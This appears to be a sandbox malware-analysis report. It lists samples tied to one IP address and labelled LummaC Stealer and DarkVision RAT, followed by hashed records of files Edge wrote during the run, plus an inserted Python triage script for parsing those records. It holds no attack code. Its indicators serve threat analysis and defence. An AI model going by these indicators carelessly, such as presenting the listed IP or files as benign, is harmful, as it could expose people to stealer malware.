• 104.21.80.52
digitalisierungskonzept_muster.js | malicious | Unknown
• 104.21.80.52
h3VYJaQqI9.exe | malicious | LummaC Stealer
• 104.21.80.52
s7.mp4.hta | malicious | LummaC
• 104.21.80.52
uU6IvUPN39.exe | malicious | LummaC
• 104.21.80.52
P2V7Mr3DUF.exe | malicious | LummaC
• 104.21.80.52
v3tb7mqP48.exe | malicious | LummaC
• 104.21.80.52
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Context
C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe: cLm7ThwEvh.msi | malicious | Unknown
LVkAi4PBv6.exe | malicious | Unknown
w3245.exe | malicious | Unknown
w3245.exe | malicious | Unknown
9mauyKC3JW.exe | malicious | Unknown
ATLEQQXO.exe | malicious | Unknown
ATLEQQXO.exe | malicious | Unknown
upgrade.hta | malicious | DarkVision Rat
MiJZ3z4t5K.exe | malicious | Unknown
UolJwovI8c.exe | malicious | Unknown
Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type: JSON data
Category: dropped
Size (bytes): 44695
Entropy (8bit): 6.0950463386966724
Encrypted: false
SSDEEP: 768:zDXzgWPsj/qlGJqIY8GB4kJWKKGf4YMZ5eatyFlAHN7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7yndMZfN7VLyMV/YoskFoz
MD5: E6F17A80820B66DBA17388136E50103A
SHA1: 4BA23B491A33DBAC4EB5BED20762DBE6C993014C
SHA-256: 3CB78D42D9BA5B1FE878605A169206581CB338AF339228249407D81081DEA19A
SHA-512: E2122837B46A6933CB59816727B7401081631BA1971C2864B12287B5082D635AF9D1ACFC1376E9DC151ABED155E06D6388A2BB66BCE76662FA393673E14A8B26
Malicious: false
Preview: {"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type: JSON data
Category: dropped
Size (bytes): 45936
Entropy (8bit): 6.088194065813754
Encrypted: false
SSDEEP: 768:UMkbJrT8IeQc5daNzKKGf4YMZPVajeQuuHXcQSfMCios7DRo+yM/42cRaLMos77:UMk1rT8H1asMZ+H9Fos7VLyMV/YosH
MD5: 62F4AF102572FC7DE68C282791D959E5
SHA1: A1A953C5618AA153BF597885EB7C3F2F69330ECF
SHA-256: 962871EEF91C510A4DAA4C37FF5C1BA56D60DDDFAA5016183255EF3A92F0521B
SHA-512: 0E828E7B0B7A5C660A7E2C05BA592EADE40B6F6019AF24DCA137B8C96C0AC334368132EAF34F1AFA080604BBFA44447A3A0CDD52170FE6FB416C4BB5F1E36354
Malicious: false
Preview: {"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"06756165-738a-4eac-aa05-b3426f7d05eb"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type: JSON data
Category: dropped
Size (bytes): 44773
Entropy (8bit): 6.095222529536204
Encrypted: false
SSDEEP: 768:zDXzgWPsj/qlGJqIY8GB4xAWKKGf4YMZPVajeQuuN7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7yOgMZ+N7VLyMV/YoskFoz
MD5: 38084BBE29F807E96DE2F9A037C2221C
SHA1: DC381DD741E0FC363ABADBF5CD0DA3F26F8ACC78
SHA-256: 7410B807237200943E4BC918BB1CFC0C56453BD4B596BA1C6B13EEACAC31BD53
SHA-512: A5F652ADC939FFF81506B98F605AF146D82F98E2B7347C0B56135138971E35B394C5409E738F4254EE57CF5BE1BCD624CBAEE2D7879676B1A3EAE93FD0934CB7
Malicious: false
                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:modified
                                                                                                                                                                Size (bytes):44695
                                                                                                                                                                Entropy (8bit):6.0950463386966724
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kJWKKGf4YMZ5eatyFlAHN7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7yndMZfN7VLyMV/YoskFoz
                                                                                                                                                                MD5:E6F17A80820B66DBA17388136E50103A
                                                                                                                                                                SHA1:4BA23B491A33DBAC4EB5BED20762DBE6C993014C
                                                                                                                                                                SHA-256:3CB78D42D9BA5B1FE878605A169206581CB338AF339228249407D81081DEA19A
                                                                                                                                                                SHA-512:E2122837B46A6933CB59816727B7401081631BA1971C2864B12287B5082D635AF9D1ACFC1376E9DC151ABED155E06D6388A2BB66BCE76662FA393673E14A8B26
                                                                                                                                                                Malicious:false
                                                                                                                                                                 Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):107893
                                                                                                                                                                Entropy (8bit):4.640159940159965
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P70:fwUQC5VwBIiElEd2K57P70
                                                                                                                                                                MD5:9B9EEAFEA0BB753A8FAEB453AB956772
                                                                                                                                                                SHA1:4F886474C956DB363B327F13F3E65B53807DB52A
                                                                                                                                                                SHA-256:F8ADE4E5D3BCFEC0035529AC7AEA621E1FB3CEF0DAC19E62521BA8433AC9A894
                                                                                                                                                                SHA-512:F3E66357046E24C3CB5D11A9E7FC7BA60393C00878D0C01DF87CEA10DCAE0F93CBBC8522C8FD92F58622E17EF2481FAECA509010FE842577016E4B201C836930
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):107893
                                                                                                                                                                Entropy (8bit):4.640159940159965
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P70:fwUQC5VwBIiElEd2K57P70
                                                                                                                                                                MD5:9B9EEAFEA0BB753A8FAEB453AB956772
                                                                                                                                                                SHA1:4F886474C956DB363B327F13F3E65B53807DB52A
                                                                                                                                                                SHA-256:F8ADE4E5D3BCFEC0035529AC7AEA621E1FB3CEF0DAC19E62521BA8433AC9A894
                                                                                                                                                                SHA-512:F3E66357046E24C3CB5D11A9E7FC7BA60393C00878D0C01DF87CEA10DCAE0F93CBBC8522C8FD92F58622E17EF2481FAECA509010FE842577016E4B201C836930
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4194304
                                                                                                                                                                Entropy (8bit):0.048007862694962676
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:KPE0m5tmcnOAUZYYaJ/7qiRDs0JEYg7Xr/eIKJEm98RVh7JNs59URQsIn2Pn8y0d:YE0UtzX01OiVhNqo22P08T2RGOD
                                                                                                                                                                MD5:3E997DA2AB11CF936672AFB3C3F77115
                                                                                                                                                                SHA1:2E31613B00271E7C2407062425D8B1AEC9840BE6
                                                                                                                                                                SHA-256:926DD0A91282233B61A2D4F1BAFA972FEFB97B58C3A18B4DC00274CB7F8678D6
                                                                                                                                                                SHA-512:5B2AED268ED78451389B4E3AEC7F38B8D02AEAC28110C5A5D142CB47A25593B75170781CE7EA807CAEDB7BFF66B8E941B40E8B11F03EF0A3EC9F7ADD2CF7CC58
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:...@..@...@.....C.].....@................k..h[..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".fglocg20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@...............................0...w..U..G..>.........."....."...24.."."xDkc0HT9c2ekfj/3J+6x4yELW+Knys1OtBnWqRtJUmw="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z....l....'@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................ .2.......,......
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4194304
                                                                                                                                                                Entropy (8bit):0.448223483660178
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6144:FNGqRRml3W/R78Sxwil0qDM9YYzNuaHzK1:uk/RgYwouTK
                                                                                                                                                                MD5:E3D04635FBCAF93FDE16BBA7034A337C
                                                                                                                                                                SHA1:97C81BF7195327B65EDED65EABA9D3E0D951630D
                                                                                                                                                                SHA-256:95ED7C4C51FF87D386E34914F9CBDA39C510B3ABDB4DBE605A9FC4BBF6B288A8
                                                                                                                                                                SHA-512:A79BA051F4A137850A05A1C406C11454F194E897AC1BD44A44E10BA0333210345E29E4BE615A2FA5BD9700B35FEE649A39556F0BDE624D61A01E0E591A92B667
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:...@..@...@.....C.].....@...............P...................`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".fglocg20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@...............................0...w..U?:K...G..>.........."....."...24.."."xDkc0HT9c2ekfj/3J+6x4yELW+Knys1OtBnWqRtJUmw="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z....l....'@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2.......y...... .2.......,...
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):280
                                                                                                                                                                Entropy (8bit):4.16517681506792
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:FiWWltlrPYjpVjP9M4UcLH3RvwAH/llwBVP/Sh/Jzv/jSIHmsdJEU9VUn5lt:o1rPWVjWZq3RvtNlwBVsJDL7b/3U7
                                                                                                                                                                MD5:C847567DEE0317368C1EC824DE025887
                                                                                                                                                                SHA1:554098F22FEA9282FE1AAB35560849CD6FF546B1
                                                                                                                                                                SHA-256:3CF2B1CBE4F4CCFC640BCF581FD4D9FC84254D2B3839C96EA4909B61AAF28932
                                                                                                                                                                SHA-512:A976744405F6ABEBFB7513A3A6A776680334BB94A9E52AEEFE2B05259BCB3CF9781B1CCDA3655D8AA4C1E923143168F29EF3208F81ABCB93AFF5215ED3798219
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:sdPC.....................!...W.F....+F."xDkc0HT9c2ekfj/3J+6x4yELW+Knys1OtBnWqRtJUmw="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................8889edf7-b09d-4a45-9ea5-adabbfd01bb9............
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):35113
                                                                                                                                                                Entropy (8bit):5.555704209770109
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:iR2bPnpWP7Pf4h8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPhGXfrwIK0WuqKpQtuj:iR2bPnpWP7Pf4hu1ja+kXsIK0Wr1tE
                                                                                                                                                                MD5:4DA99C2332B3CB18AB31DBFF80EB9E77
                                                                                                                                                                SHA1:0F77BB1A1925E717C4BF499ADE5828FE1572D2C2
                                                                                                                                                                SHA-256:04C73F86469A3B2EB3A97424C9E18A480BF52E0516F00B9C11E146B01A1BF1F2
                                                                                                                                                                SHA-512:5CC6E48D9614601B23C60B87E0967164263FE7CBD019AC7B255C7E81385E28722221F1A516E6F325084E6036DFF4189A1F31C68D9869EAC24B570837C7D4600F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380903748127814","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380903748127814","location":5,"ma
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1
                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:.
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (17385), with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):17385
                                                                                                                                                                Entropy (8bit):5.486499174778513
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:st/J99QTryDigabatSuypBsHsHyaNPjdjkcYCBAXx3uaqBp0B12s8IbV+FmWQwWe:st/PGKSu4BsMHtJjdGXpXqBpYXbGnQwN
                                                                                                                                                                MD5:E5388BD665D876C16B50EFE7BB7D3915
                                                                                                                                                                SHA1:366DA111AB66B70B2414658C902E52B4802D28D8
                                                                                                                                                                SHA-256:24EB588068E44DC591132915EA963D6451FC05BB983316CD59B52F13BCF75AC7
                                                                                                                                                                SHA-512:1EFF78A205ACB068929790B906DDE90DEFA4AEC87DBCB1F0927704754849B91DFA6B9C13F81D7DF8840585471654E1CED54ACDAEF30944E76734361C1078523F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380903748641376","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
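The records above give, for every file Edge wrote while the sample ran, a writing process, digests, an 8-bit entropy figure and a truncated preview. The following is an added example, not part of the Joe Sandbox report, showing how a triage script consumes this key:value layout: it parses the records, recomputes the Shannon entropy behind the "Entropy (8bit)" column, recomputes the listed digests for the 1-byte file whose preview "." is its complete content, separates msedge.exe-written profile state from files written by other processes, and flags entries marked Malicious, Encrypted or high-entropy. The sample records are constructed: the first two are copied from this page (the second shortened), while the third, including its process path and all-zero MD5, is hypothetical and only exercises the flagging logic.

```python
"""Triage helpers for the 'Dropped Files' records of a Joe Sandbox report as
flattened on this page: parse the key:value lines, recompute the 8-bit Shannon
entropy behind the 'Entropy (8bit)' column, cross-check listed digests where the
preview is the whole file, and flag entries worth a second look.  Added example."""
import hashlib
import math
from collections import Counter

# Constructed sample in the report's key:value layout.  Record 0 is the 1-byte
# Edge file from this page (preview '.' is its entire content), record 1 is a
# shortened BrowserMetrics entry, record 2 is hypothetical (path and MD5 made
# up) and exists only to exercise the flagging path.
SAMPLE_RECORDS = """\
Process:C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe
File Type:very short file (no magic)
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
MD5:5058F1AF8388633F609CADB75A75DC9D
SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
Malicious:false
Preview:.
Process:C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe
Size (bytes):4194304
Entropy (8bit):0.048007862694962676
Encrypted:false
MD5:3E997DA2AB11CF936672AFB3C3F77115
Malicious:false
Preview:...@..@...@.....C.].....@.....BrowserMetrics
Process:C:\\hypothetical\\payload.exe
Size (bytes):1024
Entropy (8bit):7.93
Encrypted:true
MD5:00000000000000000000000000000000
Malicious:true
Preview:....
"""

DIGEST_KEYS = {"MD5": "md5", "SHA1": "sha1", "SHA-256": "sha256", "SHA-512": "sha512"}


def parse_records(text):
    """Every 'Process:' line opens a new record.  Split at the first colon only,
    so Windows paths and JSON previews keep their own colons."""
    records, current = [], None
    for raw in text.splitlines():
        key, sep, value = raw.strip().partition(":")
        if not sep:
            continue
        if key == "Process":
            current = {}
            records.append(current)
        if current is not None:
            current[key] = value
    return records


def shannon_entropy(data):
    """Bits per byte: 0.0 for one repeated symbol, 8.0 for a uniform byte spread."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def check_preview_digests(rec):
    """When the preview is the complete file (Size equals its length), recompute the
    listed digests over it; returns {algo: matched} or {} if not applicable.  The
    report prints non-printable bytes as '.', so a mismatch on binary content is a
    rendering artefact, not evidence of tampering."""
    preview = rec.get("Preview", "").encode("utf-8")
    size = rec.get("Size (bytes)", "")
    if not size.isdigit() or int(size) != len(preview):
        return {}
    return {algo: hashlib.new(algo, preview).hexdigest() == rec[key].lower()
            for key, algo in DIGEST_KEYS.items() if key in rec}


def is_browser_profile_write(rec):
    """Files written by msedge.exe are browser profile state created when the sample
    touched Edge, not payloads dropped by the sample; keep them out of the IOC list."""
    return rec.get("Process", "").lower().endswith("\\msedge.exe")


def triage(records, entropy_threshold=7.0):
    """Return (record index, reason) pairs for entries that deserve a closer look."""
    findings = []
    for i, rec in enumerate(records):
        if rec.get("Malicious", "false").lower() == "true":
            findings.append((i, "sandbox flagged the file as malicious"))
        if rec.get("Encrypted", "false").lower() == "true":
            findings.append((i, "sandbox marked the content as encrypted"))
        ent = float(rec.get("Entropy (8bit)", "0") or 0)
        if ent >= entropy_threshold:
            findings.append((i, f"entropy {ent:.2f} suggests packed or encrypted data"))
        checks = check_preview_digests(rec)
        if checks and not all(checks.values()):
            findings.append((i, "listed digest does not match the preview bytes"))
    return findings
```

Two points the entropy column makes once you can recompute it: the 4 MB BrowserMetrics files at 0.048 and 0.45 bits per byte are consistent with preallocated files that are almost entirely zero bytes, whereas packed or encrypted payloads sit close to 8.0, so the 7.0 threshold above separates the two without looking at content. The digest check only applies when the preview is the whole file, which on this page is true for the 1-byte records; for everything else the preview is a fixed-width cut and the listed digests must be taken from the report as given.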
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1
                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:.
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):40470
                                                                                                                                                                Entropy (8bit):5.560906285723253
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:iR2bP6H7pLGLhnpWP7Pfrh8F1+UoAYDCx9Tuqh0VfUC9xbog/OVSEihGXfrwIK08:iR2bP6BchnpWP7Pfrhu1jaXEikXsIK08
                                                                                                                                                                MD5:41DFF14DF0C379E65DF15F50EE0EF07B
                                                                                                                                                                SHA1:ADD1F4DF8E6C1D8CF8F94CEC5AFFB98B29876AED
                                                                                                                                                                SHA-256:293D26F9F875A669E0BEC45769022F869582AD2EB91BFC70814407480DDF8BF0
                                                                                                                                                                SHA-512:162C323D604FA48E82988FDCBDE2B45C576845BC715DC41388F13CBCFC5011144F1E85F63C9E86725B4F5FCF8D70BE22B0E310955192EE0022CD09E58A783FCC
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380903748127814","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380903748127814","location":5,"ma
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):16
                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:MANIFEST-000001.
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):33
                                                                                                                                                                Entropy (8bit):3.5394429593752084
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:iWstvhYNrkUn:iptAd
